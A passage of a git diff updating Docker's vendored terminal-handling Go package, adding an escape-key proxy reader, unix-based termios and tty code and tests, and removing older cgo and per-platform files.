is.DeepEqual([]byte{0, 27, 126, 15}, codes)) codes, err = ToBytes("DEL,+") - if err != nil { - t.Fatal(err) - } - if len(codes) != 2 { - t.Fatalf("Expected 2 codes, got %d", len(codes)) - } - if codes[0] != 127 || codes[1] != 43 { - t.Fatalf("Expected '127 '43'', got '%d' '%d'", codes[0], codes[1]) - } + assert.NilError(t, err) + assert.Check(t, is.DeepEqual([]byte{127, 43}, codes)) } diff --git a/vendor/github.com/docker/docker/pkg/term/proxy.go b/vendor/github.com/docker/docker/pkg/term/proxy.go new file mode 100644 index 0000000000..da733e5848 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/term/proxy.go @@ -0,0 +1,78 @@ +package term // import "github.com/docker/docker/pkg/term" + +import ( + "io" +) + +// EscapeError is special error which returned by a TTY proxy reader's Read() +// method in case its detach escape sequence is read. +type EscapeError struct{} + +func (EscapeError) Error() string { + return "read escape sequence" +} + +// escapeProxy is used only for attaches with a TTY. It is used to proxy +// stdin keypresses from the underlying reader and look for the passed in +// escape key sequence to signal a detach. +type escapeProxy struct { + escapeKeys []byte + escapeKeyPos int + r io.Reader +} + +// NewEscapeProxy returns a new TTY proxy reader which wraps the given reader +// and detects when the specified escape keys are read, in which case the Read +// method will return an error of type EscapeError. +func NewEscapeProxy(r io.Reader, escapeKeys []byte) io.Reader { + return &escapeProxy{ + escapeKeys: escapeKeys, + r: r, + } +} + +func (r *escapeProxy) Read(buf []byte) (int, error) { + nr, err := r.r.Read(buf) + + if len(r.escapeKeys) == 0 { + return nr, err + } + + preserve := func() { + // this preserves the original key presses in the passed in buffer + nr += r.escapeKeyPos + preserve := make([]byte, 0, r.escapeKeyPos+len(buf)) + preserve = append(preserve, r.escapeKeys[:r.escapeKeyPos]...) + preserve = append(preserve, buf...) + r.escapeKeyPos = 0 + copy(buf[0:nr], preserve) + } + + if nr != 1 || err != nil { + if r.escapeKeyPos > 0 { + preserve() + } + return nr, err + } + + if buf[0] != r.escapeKeys[r.escapeKeyPos] { + if r.escapeKeyPos > 0 { + preserve() + } + return nr, nil + } + + if r.escapeKeyPos == len(r.escapeKeys)-1 { + return 0, EscapeError{} + } + + // Looks like we've got an escape key, but we need to match again on the next + // read. + // Store the current escape key we found so we can look for the next one on + // the next read. + // Since this is an escape key, make sure we don't let the caller read it + // If later on we find that this is not the escape sequence, we'll add the + // keys back + r.escapeKeyPos++ + return nr - r.escapeKeyPos, nil +} diff --git a/vendor/github.com/docker/docker/pkg/term/proxy_test.go b/vendor/github.com/docker/docker/pkg/term/proxy_test.go new file mode 100644 index 0000000000..df588fe15b --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/term/proxy_test.go @@ -0,0 +1,115 @@ +package term // import "github.com/docker/docker/pkg/term" + +import ( + "bytes" + "fmt" + "testing" + + "gotest.tools/assert" + is "gotest.tools/assert/cmp" +) + +func TestEscapeProxyRead(t *testing.T) { + escapeKeys, _ := ToBytes("") + keys, _ := ToBytes("a") + reader := NewEscapeProxy(bytes.NewReader(keys), escapeKeys) + buf := make([]byte, len(keys)) + nr, err := reader.Read(buf) + assert.NilError(t, err) + assert.Equal(t, nr, len(keys), fmt.Sprintf("nr %d should be equal to the number of %d", nr, len(keys))) + assert.DeepEqual(t, keys, buf) + + keys, _ = ToBytes("a,b,c") + reader = NewEscapeProxy(bytes.NewReader(keys), escapeKeys) + buf = make([]byte, len(keys)) + nr, err = reader.Read(buf) + assert.NilError(t, err) + assert.Equal(t, nr, len(keys), fmt.Sprintf("nr %d should be equal to the number of %d", nr, len(keys))) + assert.DeepEqual(t, keys, buf) + + keys, _ = ToBytes("") + reader = NewEscapeProxy(bytes.NewReader(keys), escapeKeys) + buf = make([]byte, len(keys)) + nr, err = reader.Read(buf) + assert.Assert(t, is.ErrorContains(err, ""), "Should throw error when no keys are to read") + assert.Equal(t, nr, 0, "nr should be zero") + assert.Check(t, is.Len(keys, 0)) + assert.Check(t, is.Len(buf, 0)) + + escapeKeys, _ = ToBytes("DEL") + keys, _ = ToBytes("a,b,c,+") + reader = NewEscapeProxy(bytes.NewReader(keys), escapeKeys) + buf = make([]byte, len(keys)) + nr, err = reader.Read(buf) + assert.NilError(t, err) + assert.Equal(t, nr, len(keys), fmt.Sprintf("nr %d should be equal to the number of %d", nr, len(keys))) + assert.DeepEqual(t, keys, buf) + + keys, _ = ToBytes("") + reader = NewEscapeProxy(bytes.NewReader(keys), escapeKeys) + buf = make([]byte, len(keys)) + nr, err = reader.Read(buf) + assert.Assert(t, is.ErrorContains(err, ""), "Should throw error when no keys are to read") + assert.Equal(t, nr, 0, "nr should be zero") + assert.Check(t, is.Len(keys, 0)) + assert.Check(t, is.Len(buf, 0)) + + escapeKeys, _ = ToBytes("ctrl-x,ctrl-@") + keys, _ = ToBytes("DEL") + reader = NewEscapeProxy(bytes.NewReader(keys), escapeKeys) + buf = make([]byte, len(keys)) + nr, err = reader.Read(buf) + assert.NilError(t, err) + assert.Equal(t, nr, 1, fmt.Sprintf("nr %d should be equal to the number of 1", nr)) + assert.DeepEqual(t, keys, buf) + + escapeKeys, _ = ToBytes("ctrl-c") + keys, _ = ToBytes("ctrl-c") + reader = NewEscapeProxy(bytes.NewReader(keys), escapeKeys) + buf = make([]byte, len(keys)) + nr, err = reader.Read(buf) + assert.Error(t, err, "read escape sequence") + assert.Equal(t, nr, 0, "nr should be equal to 0") + assert.DeepEqual(t, keys, buf) + + escapeKeys, _ = ToBytes("ctrl-c,ctrl-z") + keys, _ = ToBytes("ctrl-c,ctrl-z") + reader = NewEscapeProxy(bytes.NewReader(keys), escapeKeys) + buf = make([]byte, 1) + nr, err = reader.Read(buf) + assert.NilError(t, err) + assert.Equal(t, nr, 0, "nr should be equal to 0") + assert.DeepEqual(t, keys[0:1], buf) + nr, err = reader.Read(buf) + assert.Error(t, err, "read escape sequence") + assert.Equal(t, nr, 0, "nr should be equal to 0") + assert.DeepEqual(t, keys[1:], buf) + + escapeKeys, _ = ToBytes("ctrl-c,ctrl-z") + keys, _ = ToBytes("ctrl-c,DEL,+") + reader = NewEscapeProxy(bytes.NewReader(keys), escapeKeys) + buf = make([]byte, 1) + nr, err = reader.Read(buf) + assert.NilError(t, err) + assert.Equal(t, nr, 0, "nr should be equal to 0") + assert.DeepEqual(t, keys[0:1], buf) + buf = make([]byte, len(keys)) + nr, err = reader.Read(buf) + assert.NilError(t, err) + assert.Equal(t, nr, len(keys), fmt.Sprintf("nr should be equal to %d", len(keys))) + assert.DeepEqual(t, keys, buf) + + escapeKeys, _ = ToBytes("ctrl-c,ctrl-z") + keys, _ = ToBytes("ctrl-c,DEL") + reader = NewEscapeProxy(bytes.NewReader(keys), escapeKeys) + buf = make([]byte, 1) + nr, err = reader.Read(buf) + assert.NilError(t, err) + assert.Equal(t, nr, 0, "nr should be equal to 0") + assert.DeepEqual(t, keys[0:1], buf) + buf = make([]byte, len(keys)) + nr, err = reader.Read(buf) + assert.NilError(t, err) + assert.Equal(t, nr, len(keys), fmt.Sprintf("nr should be equal to %d", len(keys))) + assert.DeepEqual(t, keys, buf) +} diff --git a/vendor/github.com/docker/docker/pkg/term/tc.go b/vendor/github.com/docker/docker/pkg/term/tc.go new file mode 100644 index 0000000000..01bcaa8abb --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/term/tc.go @@ -0,0 +1,20 @@ +// +build !windows + +package term // import "github.com/docker/docker/pkg/term" + +import ( + "syscall" + "unsafe" + + "golang.org/x/sys/unix" +) + +func tcget(fd uintptr, p *Termios) syscall.Errno { + _, _, err := unix.Syscall(unix.SYS_IOCTL, fd, uintptr(getTermios), uintptr(unsafe.Pointer(p))) + return err +} + +func tcset(fd uintptr, p *Termios) syscall.Errno { + _, _, err := unix.Syscall(unix.SYS_IOCTL, fd, setTermios, uintptr(unsafe.Pointer(p))) + return err +} diff --git a/vendor/github.com/docker/docker/pkg/term/tc_linux_cgo.go b/vendor/github.com/docker/docker/pkg/term/tc_linux_cgo.go deleted file mode 100644 index 59dac5ba8e..0000000000 --- a/vendor/github.com/docker/docker/pkg/term/tc_linux_cgo.go +++ /dev/null @@ -1,50 +0,0 @@ -// +build linux,cgo - -package term - -import ( - "syscall" - "unsafe" -) - -// #include -import "C" - -// Termios is the Unix API for terminal I/O. -// It is passthrough for syscall.Termios in order to make it portable with -// other platforms where it is not available or handled differently. -type Termios syscall.Termios - -// MakeRaw put the terminal connected to the given file descriptor into raw -// mode and returns the previous state of the terminal so that it can be -// restored. -func MakeRaw(fd uintptr) (*State, error) { - var oldState State - if err := tcget(fd, &oldState.termios); err != 0 { - return nil, err - } - - newState := oldState.termios - - C.cfmakeraw((*C.struct_termios)(unsafe.Pointer(&newState))) - if err := tcset(fd, &newState); err != 0 { - return nil, err - } - return &oldState, nil -} - -func tcget(fd uintptr, p *Termios) syscall.Errno { - ret, err := C.tcgetattr(C.int(fd), (*C.struct_termios)(unsafe.Pointer(p))) - if ret != 0 { - return err.(syscall.Errno) - } - return 0 -} - -func tcset(fd uintptr, p *Termios) syscall.Errno { - ret, err := C.tcsetattr(C.int(fd), C.TCSANOW, (*C.struct_termios)(unsafe.Pointer(p))) - if ret != 0 { - return err.(syscall.Errno) - } - return 0 -} diff --git a/vendor/github.com/docker/docker/pkg/term/tc_other.go b/vendor/github.com/docker/docker/pkg/term/tc_other.go deleted file mode 100644 index 750d7c3f60..0000000000 --- a/vendor/github.com/docker/docker/pkg/term/tc_other.go +++ /dev/null @@ -1,20 +0,0 @@ -// +build !windows -// +build !linux !cgo -// +build !solaris !cgo - -package term - -import ( - "syscall" - "unsafe" -) - -func tcget(fd uintptr, p *Termios) syscall.Errno { - _, _, err := syscall.Syscall(syscall.SYS_IOCTL, fd, uintptr(getTermios), uintptr(unsafe.Pointer(p))) - return err -} - -func tcset(fd uintptr, p *Termios) syscall.Errno { - _, _, err := syscall.Syscall(syscall.SYS_IOCTL, fd, setTermios, uintptr(unsafe.Pointer(p))) - return err -} diff --git a/vendor/github.com/docker/docker/pkg/term/tc_solaris_cgo.go b/vendor/github.com/docker/docker/pkg/term/tc_solaris_cgo.go deleted file mode 100644 index c9139d0ca8..0000000000 --- a/vendor/github.com/docker/docker/pkg/term/tc_solaris_cgo.go +++ /dev/null @@ -1,63 +0,0 @@ -// +build solaris,cgo - -package term - -import ( - "syscall" - "unsafe" -) - -// #include -import "C" - -// Termios is the Unix API for terminal I/O. -// It is passthrough for syscall.Termios in order to make it portable with -// other platforms where it is not available or handled differently. -type Termios syscall.Termios - -// MakeRaw put the terminal connected to the given file descriptor into raw -// mode and returns the previous state of the terminal so that it can be -// restored. -func MakeRaw(fd uintptr) (*State, error) { - var oldState State - if err := tcget(fd, &oldState.termios); err != 0 { - return nil, err - } - - newState := oldState.termios - - newState.Iflag &^= (syscall.IGNBRK | syscall.BRKINT | syscall.PARMRK | syscall.ISTRIP | syscall.INLCR | syscall.IGNCR | syscall.ICRNL | syscall.IXON | syscall.IXANY) - newState.Oflag &^= syscall.OPOST - newState.Lflag &^= (syscall.ECHO | syscall.ECHONL | syscall.ICANON | syscall.ISIG | syscall.IEXTEN) - newState.Cflag &^= (syscall.CSIZE | syscall.PARENB) - newState.Cflag |= syscall.CS8 - - /* - VMIN is the minimum number of characters that needs to be read in non-canonical mode for it to be returned - Since VMIN is overloaded with another element in canonical mode when we switch modes it defaults to 4. It - needs to be explicitly set to 1. - */ - newState.Cc[C.VMIN] = 1 - newState.Cc[C.VTIME] = 0 - - if err := tcset(fd, &newState); err != 0 { - return nil, err - } - return &oldState, nil -} - -func tcget(fd uintptr, p *Termios) syscall.Errno { - ret, err := C.tcgetattr(C.int(fd), (*C.struct_termios)(unsafe.Pointer(p))) - if ret != 0 { - return err.(syscall.Errno) - } - return 0 -} - -func tcset(fd uintptr, p *Termios) syscall.Errno { - ret, err := C.tcsetattr(C.int(fd), C.TCSANOW, (*C.struct_termios)(unsafe.Pointer(p))) - if ret != 0 { - return err.(syscall.Errno) - } - return 0 -} diff --git a/vendor/github.com/docker/docker/pkg/term/term.go b/vendor/github.com/docker/docker/pkg/term/term.go index fe59faa949..0589a95519 100644 --- a/vendor/github.com/docker/docker/pkg/term/term.go +++ b/vendor/github.com/docker/docker/pkg/term/term.go @@ -2,7 +2,7 @@ // Package term provides structures and helper functions to work with // terminal (state, sizes). -package term +package term // import "github.com/docker/docker/pkg/term" import ( "errors" @@ -10,7 +10,8 @@ import ( "io" "os" "os/signal" - "syscall" + + "golang.org/x/sys/unix" ) var ( @@ -31,7 +32,7 @@ type Winsize struct { y uint16 } -// StdStreams returns the standard streams (stdin, stdout, stedrr). +// StdStreams returns the standard streams (stdin, stdout, stderr). func StdStreams() (stdIn io.ReadCloser, stdOut, stdErr io.Writer) { return os.Stdin, os.Stdout, os.Stderr } @@ -79,7 +80,7 @@ func SaveState(fd uintptr) (*State, error) { // descriptor, with echo disabled. func DisableEcho(fd uintptr, state *State) error { newState := state.termios - newState.Lflag &^= syscall.ECHO + newState.Lflag &^= unix.ECHO if err := tcset(fd, &newState); err != 0 { return err diff --git a/vendor/github.com/docker/docker/pkg/term/term_linux_test.go b/vendor/github.com/docker/docker/pkg/term/term_linux_test.go new file mode 100644 index 0000000000..272395a10e --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/term/term_linux_test.go @@ -0,0 +1,117 @@ +//+build linux + +package term // import "github.com/docker/docker/pkg/term" + +import ( + "io/ioutil" + "os" + "testing" + + "github.com/google/go-cmp/cmp" + "gotest.tools/assert" +) + +// RequiresRoot skips tests that require root, unless the test.root flag has +// been set +func RequiresRoot(t *testing.T) { + if os.Getuid() != 0 { + t.Skip("skipping test that requires root") + return + } +} + +func newTtyForTest(t *testing.T) (*os.File, error) { + RequiresRoot(t) + return os.OpenFile("/dev/tty", os.O_RDWR, os.ModeDevice) +} + +func newTempFile() (*os.File, error) { + return ioutil.TempFile(os.TempDir(), "temp") +} + +func TestGetWinsize(t *testing.T) { + tty, err := newTtyForTest(t) + defer tty.Close() + assert.NilError(t, err) + winSize, err := GetWinsize(tty.Fd()) + assert.NilError(t, err) + assert.Assert(t, winSize != nil) + + newSize := Winsize{Width: 200, Height: 200, x: winSize.x, y: winSize.y} + err = SetWinsize(tty.Fd(), &newSize) + assert.NilError(t, err) + winSize, err = GetWinsize(tty.Fd()) + assert.NilError(t, err) + assert.DeepEqual(t, *winSize, newSize, cmpWinsize) +} + +var cmpWinsize = cmp.AllowUnexported(Winsize{}) + +func TestSetWinsize(t *testing.T) { + tty, err := newTtyForTest(t) + defer tty.Close() + assert.NilError(t, err) + winSize, err := GetWinsize(tty.Fd()) + assert.NilError(t, err) + assert.Assert(t, winSize != nil) + newSize := Winsize{Width: 200, Height: 200, x: winSize.x, y: winSize.y} + err = SetWinsize(tty.Fd(), &newSize) + assert.NilError(t, err) + winSize, err = GetWinsize(tty.Fd()) + assert.NilError(t, err) + assert.DeepEqual(t, *winSize, newSize, cmpWinsize) +} + +func TestGetFdInfo(t *testing.T) { + tty, err := newTtyForTest(t) + defer tty.Close() + assert.NilError(t, err) + inFd, isTerminal := GetFdInfo(tty) + assert.Equal(t, inFd, tty.Fd()) + assert.Equal(t, isTerminal, true) + tmpFile, err := newTempFile() + assert.NilError(t, err) + defer tmpFile.Close() + inFd, isTerminal = GetFdInfo(tmpFile) + assert.Equal(t, inFd, tmpFile.Fd()) + assert.Equal(t, isTerminal, false) +} + +func TestIsTerminal(t *testing.T) { + tty, err := newTtyForTest(t) + defer tty.Close() + assert.NilError(t, err) + isTerminal := IsTerminal(tty.Fd()) + assert.Equal(t, isTerminal, true) + tmpFile, err := newTempFile() + assert.NilError(t, err) + defer tmpFile.Close() + isTerminal = IsTerminal(tmpFile.Fd()) + assert.Equal(t, isTerminal, false) +} + +func TestSaveState(t *testing.T) { + tty, err := newTtyForTest(t) + defer tty.Close() + assert.NilError(t, err) + state, err := SaveState(tty.Fd()) + assert.NilError(t, err) + assert.Assert(t, state != nil) + tty, err = newTtyForTest(t) + assert.NilError(t, err) + defer tty.Close() + err = RestoreTerminal(tty.Fd(), state) + assert.NilError(t, err) +} + +func TestDisableEcho(t *testing.T) { + tty, err := newTtyForTest(t) + defer tty.Close() + assert.NilError(t, err) + state, err := SetRawTerminal(tty.Fd()) + defer RestoreTerminal(tty.Fd(), state) + assert.NilError(t, err) + assert.Assert(t, state != nil) + err = DisableEcho(tty.Fd(), state) + assert.NilError(t, err) +} diff --git a/vendor/github.com/docker/docker/pkg/term/term_solaris.go b/vendor/github.com/docker/docker/pkg/term/term_solaris.go deleted file mode 100644 index 112debbec5..0000000000 --- a/vendor/github.com/docker/docker/pkg/term/term_solaris.go +++ /dev/null @@ -1,41 +0,0 @@ -// +build solaris - -package term - -import ( - "syscall" - "unsafe" -) - -/* -#include -#include -#include - -// Small wrapper to get rid of variadic args of ioctl() -int my_ioctl(int fd, int cmd, struct winsize *ws) { - return ioctl(fd, cmd, ws); -} -*/ -import "C" - -// GetWinsize returns the window size based on the specified file descriptor. -func GetWinsize(fd uintptr) (*Winsize, error) { - ws := &Winsize{} - ret, err := C.my_ioctl(C.int(fd), C.int(syscall.TIOCGWINSZ), (*C.struct_winsize)(unsafe.Pointer(ws))) - // Skip retval = 0 - if ret == 0 { - return ws, nil - } - return ws, err -} - -// SetWinsize tries to set the specified window size for the specified file descriptor. -func SetWinsize(fd uintptr, ws *Winsize) error { - ret, err := C.my_ioctl(C.int(fd), C.int(syscall.TIOCSWINSZ), (*C.struct_winsize)(unsafe.Pointer(ws))) - // Skip retval = 0 - if ret == 0 { - return nil - } - return err -} diff --git a/vendor/github.com/docker/docker/pkg/term/term_unix.go b/vendor/github.com/docker/docker/pkg/term/term_unix.go deleted file mode 100644 index ddf87a0e58..0000000000 --- a/vendor/github.com/docker/docker/pkg/term/term_unix.go +++ /dev/null @@ -1,29 +0,0 @@ -// +build !solaris,!windows - -package term - -import ( - "syscall" - "unsafe" -) - -// GetWinsize returns the window size based on the specified file descriptor. -func GetWinsize(fd uintptr) (*Winsize, error) { - ws := &Winsize{} - _, _, err := syscall.Syscall(syscall.SYS_IOCTL, fd, uintptr(syscall.TIOCGWINSZ), uintptr(unsafe.Pointer(ws))) - // Skipp errno = 0 - if err == 0 { - return ws, nil - } - return ws, err -} - -// SetWinsize tries to set the specified window size for the specified file descriptor. -func SetWinsize(fd uintptr, ws *Winsize) error { - _, _, err := syscall.Syscall(syscall.SYS_IOCTL, fd, uintptr(syscall.TIOCSWINSZ), uintptr(unsafe.Pointer(ws))) - // Skipp errno = 0 - if err == 0 { - return nil - } - return err -} diff --git a/vendor/github.com/docker/docker/pkg/term/term_windows.go b/vendor/github.com/docker/docker/pkg/term/term_windows.go index a91f07e482..64ead3c53b 100644 --- a/vendor/github.com/docker/docker/pkg/term/term_windows.go +++ b/vendor/github.com/docker/docker/pkg/term/term_windows.go @@ -1,12 +1,10 @@ -// +build windows - -package term +package term // import "github.com/docker/docker/pkg/term" import ( "io" "os" "os/signal" - "syscall" + "syscall" // used for STD_INPUT_HANDLE, STD_OUTPUT_HANDLE and STD_ERROR_HANDLE "github.com/Azure/go-ansiterm/winterm" "github.com/docker/docker/pkg/term/windows" @@ -23,25 +21,18 @@ type Winsize struct { Width uint16 } -const ( - // https://msdn.microsoft.com/en-us/library/windows/desktop/ms683167(v=vs.85).aspx - enableVirtualTerminalInput = 0x0200 - enableVirtualTerminalProcessing = 0x0004 - disableNewlineAutoReturn = 0x0008 -) - -// vtInputSupported is true if enableVirtualTerminalInput is supported by the console +// vtInputSupported is true if winterm.ENABLE_VIRTUAL_TERMINAL_INPUT is supported by the console var vtInputSupported bool -// StdStreams returns the standard streams (stdin, stdout, stedrr). +// StdStreams returns the standard streams (stdin, stdout, stderr). func StdStreams() (stdIn io.ReadCloser, stdOut, stdErr io.Writer) { // Turn on VT handling on all std handles, if possible. This might // fail, in which case we will fall back to terminal emulation. var emulateStdin, emulateStdout, emulateStderr bool fd := os.Stdin.Fd() if mode, err := winterm.GetConsoleMode(fd); err == nil { - // Validate that enableVirtualTerminalInput is supported, but do not set it. - if err = winterm.SetConsoleMode(fd, mode|enableVirtualTerminalInput); err != nil { + // Validate that winterm.ENABLE_VIRTUAL_TERMINAL_INPUT is supported, but do not set it. + if err = winterm.SetConsoleMode(fd, mode|winterm.ENABLE_VIRTUAL_TERMINAL_INPUT); err != nil { emulateStdin = true } else { vtInputSupported = true @@ -53,21 +44,21 @@ func StdStreams() (stdIn io.ReadCloser, stdOut, stdErr io.Writer) { fd = os.Stdout.Fd() if mode, err := winterm.GetConsoleMode(fd); err == nil { - // Validate disableNewlineAutoReturn is supported, but do not set it. - if err = winterm.SetConsoleMode(fd, mode|enableVirtualTerminalProcessing|disableNewlineAutoReturn); err != nil { + // Validate winterm.DISABLE_NEWLINE_AUTO_RETURN is supported, but do not set it. + if err = winterm.SetConsoleMode(fd, mode|winterm.ENABLE_VIRTUAL_TERMINAL_PROCESSING|winterm.DISABLE_NEWLINE_AUTO_RETURN); err != nil { emulateStdout = true } else { - winterm.SetConsoleMode(fd, mode|enableVirtualTerminalProcessing) + winterm.SetConsoleMode(fd, mode|winterm.ENABLE_VIRTUAL_TERMINAL_PROCESSING) } } fd = os.Stderr.Fd() if mode, err := winterm.GetConsoleMode(fd); err == nil { - // Validate disableNewlineAutoReturn is supported, but do not set it. - if err = winterm.SetConsoleMode(fd, mode|enableVirtualTerminalProcessing|disableNewlineAutoReturn); err != nil { + // Validate winterm.DISABLE_NEWLINE_AUTO_RETURN is supported, but do not set it. + if err = winterm.SetConsoleMode(fd, mode|winterm.ENABLE_VIRTUAL_TERMINAL_PROCESSING|winterm.DISABLE_NEWLINE_AUTO_RETURN); err != nil { emulateStderr = true } else { - winterm.SetConsoleMode(fd, mode|enableVirtualTerminalProcessing) + winterm.SetConsoleMode(fd, mode|winterm.ENABLE_VIRTUAL_TERMINAL_PROCESSING) } } @@ -78,20 +69,24 @@ func StdStreams() (stdIn io.ReadCloser, stdOut, stdErr io.Writer) { emulateStderr = false } + // Temporarily use STD_INPUT_HANDLE, STD_OUTPUT_HANDLE and + // STD_ERROR_HANDLE from syscall rather than x/sys/windows as long as + // go-ansiterm hasn't switch to x/sys/windows. + // TODO: switch back to x/sys/windows once go-ansiterm has switched if emulateStdin { - stdIn = windows.NewAnsiReader(syscall.STD_INPUT_HANDLE) + stdIn = windowsconsole.NewAnsiReader(syscall.STD_INPUT_HANDLE) } else { stdIn = os.Stdin } if emulateStdout { - stdOut = windows.NewAnsiWriter(syscall.STD_OUTPUT_HANDLE) + stdOut = windowsconsole.NewAnsiWriter(syscall.STD_OUTPUT_HANDLE) } else { stdOut = os.Stdout } if emulateStderr { - stdErr = windows.NewAnsiWriter(syscall.STD_ERROR_HANDLE) + stdErr = windowsconsole.NewAnsiWriter(syscall.STD_ERROR_HANDLE) } else { stdErr = os.Stderr } @@ -101,7 +96,7 @@ func StdStreams() (stdIn io.ReadCloser, stdOut, stdErr io.Writer) { // GetFdInfo returns the file descriptor for an os.File and indicates whether the file represents a terminal. func GetFdInfo(in interface{}) (uintptr, bool) { - return windows.GetHandleInfo(in) + return windowsconsole.GetHandleInfo(in) } // GetWinsize returns the window size based on the specified file descriptor. @@ -121,7 +116,7 @@ func GetWinsize(fd uintptr) (*Winsize, error) { // IsTerminal returns true if the given file descriptor is a terminal. func IsTerminal(fd uintptr) bool { - return windows.IsConsole(fd) + return windowsconsole.IsConsole(fd) } // RestoreTerminal restores the terminal connected to the given file descriptor @@ -179,9 +174,9 @@ func SetRawTerminalOutput(fd uintptr) (*State, error) { return nil, err } - // Ignore failures, since disableNewlineAutoReturn might not be supported on this + // Ignore failures, since winterm.DISABLE_NEWLINE_AUTO_RETURN might not be supported on this // version of Windows. - winterm.SetConsoleMode(fd, state.mode|disableNewlineAutoReturn) + winterm.SetConsoleMode(fd, state.mode|winterm.DISABLE_NEWLINE_AUTO_RETURN) return state, err } @@ -211,7 +206,7 @@ func MakeRaw(fd uintptr) (*State, error) { mode |= winterm.ENABLE_INSERT_MODE mode |= winterm.ENABLE_QUICK_EDIT_MODE if vtInputSupported { - mode |= enableVirtualTerminalInput + mode |= winterm.ENABLE_VIRTUAL_TERMINAL_INPUT } err = winterm.SetConsoleMode(fd, mode) diff --git a/vendor/github.com/docker/docker/pkg/term/termios_bsd.go b/vendor/github.com/docker/docker/pkg/term/termios_bsd.go new file mode 100644 index 0000000000..48b16f5203 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/term/termios_bsd.go @@ -0,0 +1,42 @@ +// +build darwin freebsd openbsd netbsd + +package term // import "github.com/docker/docker/pkg/term" + +import ( + "unsafe" + + "golang.org/x/sys/unix" +) + +const ( + getTermios = unix.TIOCGETA + setTermios = unix.TIOCSETA +) + +// Termios is the Unix API for terminal I/O. +type Termios unix.Termios + +// MakeRaw put the terminal connected to the given file descriptor into raw +// mode and returns the previous state of the terminal so that it can be +// restored. +func MakeRaw(fd uintptr) (*State, error) { + var oldState State + if _, _, err := unix.Syscall(unix.SYS_IOCTL, fd, getTermios, uintptr(unsafe.Pointer(&oldState.termios))); err != 0 { + return nil, err + } + + newState := oldState.termios + newState.Iflag &^= (unix.IGNBRK | unix.BRKINT | unix.PARMRK | unix.ISTRIP | unix.INLCR | unix.IGNCR | unix.ICRNL | unix.IXON) + newState.Oflag &^= unix.OPOST + newState.Lflag &^= (unix.ECHO | unix.ECHONL | unix.ICANON | unix.ISIG | unix.IEXTEN) + newState.Cflag &^= (unix.CSIZE | unix.PARENB) + newState.Cflag |= unix.CS8 + newState.Cc[unix.VMIN] = 1 + newState.Cc[unix.VTIME] = 0 + + if _, _, err := unix.Syscall(unix.SYS_IOCTL, fd, setTermios, uintptr(unsafe.Pointer(&newState))); err != 0 { + return nil, err + } + + return &oldState, nil +} diff --git a/vendor/github.com/docker/docker/pkg/term/termios_darwin.go b/vendor/github.com/docker/docker/pkg/term/termios_darwin.go deleted file mode 100644 index 480db900ac..0000000000 --- a/vendor/github.com/docker/docker/pkg/term/termios_darwin.go +++ /dev/null @@ -1,69 +0,0 @@ -package term - -import ( - "syscall" - "unsafe" -) - -const ( - getTermios = syscall.TIOCGETA - setTermios = syscall.TIOCSETA -) - -// Termios magic numbers, passthrough to the ones defined in syscall. -const ( - IGNBRK = syscall.IGNBRK - PARMRK = syscall.PARMRK - INLCR = syscall.INLCR - IGNCR = syscall.IGNCR - ECHONL = syscall.ECHONL - CSIZE = syscall.CSIZE - ICRNL = syscall.ICRNL - ISTRIP = syscall.ISTRIP - PARENB = syscall.PARENB - ECHO = syscall.ECHO - ICANON = syscall.ICANON - ISIG = syscall.ISIG - IXON = syscall.IXON - BRKINT = syscall.BRKINT - INPCK = syscall.INPCK - OPOST = syscall.OPOST - CS8 = syscall.CS8 - IEXTEN = syscall.IEXTEN -) - -// Termios is the Unix API for terminal I/O. -type Termios struct { - Iflag uint64 - Oflag uint64 - Cflag uint64 - Lflag uint64 - Cc [20]byte - Ispeed uint64 - Ospeed uint64 -} - -// MakeRaw put the terminal connected to the given file descriptor into raw -// mode and returns the previous state of the terminal so that it can be -// restored. -func MakeRaw(fd uintptr) (*State, error) { - var oldState State - if _, _, err := syscall.Syscall(syscall.SYS_IOCTL, fd, uintptr(getTermios), uintptr(unsafe.Pointer(&oldState.termios))); err != 0 { - return nil, err - } - - newState := oldState.termios - newState.Iflag &^= (IGNBRK | BRKINT | PARMRK | ISTRIP | INLCR | IGNCR | ICRNL | IXON) - newState.Oflag &^= OPOST - newState.Lflag &^= (ECHO | ECHONL | ICANON | ISIG | IEXTEN) - newState.Cflag &^= (CSIZE | PARENB) - newState.Cflag |= CS8 - newState.Cc[syscall.VMIN] = 1 - newState.Cc[syscall.VTIME] = 0 - - if _, _, err := syscall.Syscall(syscall.SYS_IOCTL, fd, uintptr(setTermios), uintptr(unsafe.Pointer(&newState))); err != 0 { - return nil, err - } - - return &oldState, nil -} diff --git a/vendor/github.com/docker/docker/pkg/term/termios_freebsd.go b/vendor/github.com/docker/docker/pkg/term/termios_freebsd.go deleted file mode 100644 index ed843ad69c..0000000000 --- a/vendor/github.com/docker/docker/pkg/term/termios_freebsd.go +++ /dev/null @@ -1,69 +0,0 @@ -package term - -import ( - "syscall" - "unsafe" -) - -const ( - getTermios = syscall.TIOCGETA - setTermios = syscall.TIOCSETA -) - -// Termios magic numbers, passthrough to the ones defined in syscall. -const ( - IGNBRK = syscall.IGNBRK - PARMRK = syscall.PARMRK - INLCR = syscall.INLCR - IGNCR = syscall.IGNCR - ECHONL = syscall.ECHONL - CSIZE = syscall.CSIZE - ICRNL = syscall.ICRNL - ISTRIP = syscall.ISTRIP - PARENB = syscall.PARENB - ECHO = syscall.ECHO - ICANON = syscall.ICANON - ISIG = syscall.ISIG - IXON = syscall.IXON - BRKINT = syscall.BRKINT - INPCK = syscall.INPCK - OPOST = syscall.OPOST - CS8 = syscall.CS8 - IEXTEN = syscall.IEXTEN -) - -// Termios is the Unix API for terminal I/O. -type Termios struct { - Iflag uint32 - Oflag uint32 - Cflag uint32 - Lflag uint32 - Cc [20]byte - Ispeed uint32 - Ospeed uint32 -} - -// MakeRaw put the terminal connected to the given file descriptor into raw -// mode and returns the previous state of the terminal so that it can be -// restored. -func MakeRaw(fd uintptr) (*State, error) { - var oldState State - if _, _, err := syscall.Syscall(syscall.SYS_IOCTL, fd, uintptr(getTermios), uintptr(unsafe.Pointer(&oldState.termios))); err != 0 { - return nil, err - } - - newState := oldState.termios - newState.Iflag &^= (IGNBRK | BRKINT | PARMRK | ISTRIP | INLCR | IGNCR | ICRNL | IXON) - newState.Oflag &^= OPOST - newState.Lflag &^= (ECHO | ECHONL | ICANON | ISIG | IEXTEN) - newState.Cflag &^= (CSIZE | PARENB) - 